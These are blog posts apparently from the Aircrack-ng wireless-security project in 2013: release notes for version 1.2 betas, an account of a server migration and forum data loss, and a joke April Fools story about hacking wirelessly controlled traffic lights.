Saturday, November 30, 2013

Aircrack-ng 1.2 Beta 2 release

Here is a second beta. Enjoy it ;)

Release Notes:
  • Airbase-ng IE order fixed
  • Improved WEP cracking speed using PTW
  • Fixed WPA capture decryption when WMM is used
  • Fixed memory leaks in several parts of the suite
  • Fixed compilation with recent version of gcc, on cygwin and on Gentoo hardened
  • Now using Coverity Scan for static code analysis
  • Lots of other small fixes

Detailed changelog:
  • Airbase-ng: Fixed order of IE when creating soft Access Point.
  • Airbase-ng: Fixed Caffe Latte Attack not working for all clients.
  • Aircrack-ng: Improved PTW speed thanks to Ramiro Polla.
  • Airmon-zc: Fixed improper use of the interface.
  • Airdecap-ng: Fixed decoding captures with WMM enabled.
  • Various: Fixed memory leaks in Aircrack-ng, Aireplay-ng, OSdep.
  • Added support for static analysis using Coverity Scan.
  • Fixed compilation due to PIC unfriendly assembly on Gentoo hardened.
  • Fixed running tests using 'make check'.
  • Fixed building aircrack-ng with recent version of gcc and also on cygwin.
  • Various other small fixes.

Saturday, May 25, 2013

Aircrack-ng 1.2 Beta 1 Release

After a few years, we finally got a release: 1.2 Beta 1. Enjoy ;-)

Release summary:
  • Compilation fixes on all supported OSes.
  • Makefile improvement and fixes.
  • A lot of fixes and improvements on all tools and documentation.
  • Fixed licensing issues.
  • Added a few new tools and scripts (including distributed cracking tool).
  • Fixed endianness and QoS issues.

You can find more details in the ChangeLog and even more in our subversion history.

And, 2 more things:
  • The forum will be ready in a few days.
  • We are now using Travis CI for continuous integration

Monday, May 20, 2013

Trac migration and forum crash details


You probably didn't notice but I had been working a lot on the servers and I recently migrated our old trac server to a new server.

However, a migration never goes without a glitch (who unleashed Murphy?). A few settings changes needs to be done for Trac and we're done but SVN was behaving. The only solution I saw is moving it temporarily to a separate server/URL:
You can also reach it via https but it's a self signed certificate for now.
Since the repository UUID didn't change, you can simply relocate your local copy or check out with the new svn URL.

Trac URL didn't change and it is now also available via HTTPS with a proper certificate


It had a big issue a few weeks ago. My provider told me their log says the instance was stopped. However, their cloud system crashed the instance.

The non-persistant disk where the OS of the instance is installed goes back to its original state (so any data/customization on that disk is lost) when the VM is stopped or archived. I already had similar issues before but I was able to force the instance to reboot so it wasn't a big deal.

Forum data is hosted on a MySQL database and those files were on the non-persistant disk.

Good news: Forum files and Apache config were stored on the persistant disk and I had a backup script for the DB.
Bad news: last time the backup script ran was in July 2012.
Lesson learned: check every often that the backup scripts are still running.

We lost about 10 month of posts and I am deeply sorry for what happened. I had a discussion with my provider and I'm now downsizing due to that issue, past issues and their customer support. I'll only keep stuff that never gave me any issue: domains.
Trac was the first service to be migrated to the new server a very good friend gave me (I can't thank him enough for that). Other services will be moved on that server too.

Monday, April 1, 2013

April Fools - Wirelessly controller traffic light

Hello guys,

Some time ago, a person who shall not be named emailed me and talked about new traffic lights that can be controlled wirelessly. Since access points are getting pretty powerful these days, it makes sense that they are now embedded in traffic lights to control them. The reason behind making it wirelessly accessible is to make maintenance easier for technicians so that they don't have to open the whole thing. They just have to connect to the AP inside the traffic light to do it.

Here is the maintenance page. The URL of that page is blurred for security reasons:

Since there is no reference to it on other pages and it's so basic, I guess they forgot to remove it on production units (or maybe it is just meant to be used by technicians/developers or it is security by obscurity). On other pages you can input parameters of the traffic lights when it is in automatic mode such as operating times (it will blink yellow when outside of it), how long does each light last, etc...

He even sent me one of those traffic light. As a side note, you would be amazed by the size of those things:

Here is a close-up where the AP is:

The network cable you can see is used to interconnect different traffic lights at crossroads to synchronize several of them. 

Well, of course, since they don't want people to just hack in and mess with the traffic lights, they did not make it easy to connect (SSID is random) and to find that page. However, the person who contacted me managed to grab the handshake while the maintenance guy was doing maintenance and apparently, they use the same easy passphrase ("Maintenance123") on ALL those new traffic lights. By decrypting the traffic, he figured out the page where you can control the traffic light manually.

We both tried to contact the company to let them know about the flaws since it's pretty unsafe/dangerous to be able to change the light on live traffic lights and especially since they use the same passphrase on all of them. But they never got back to us.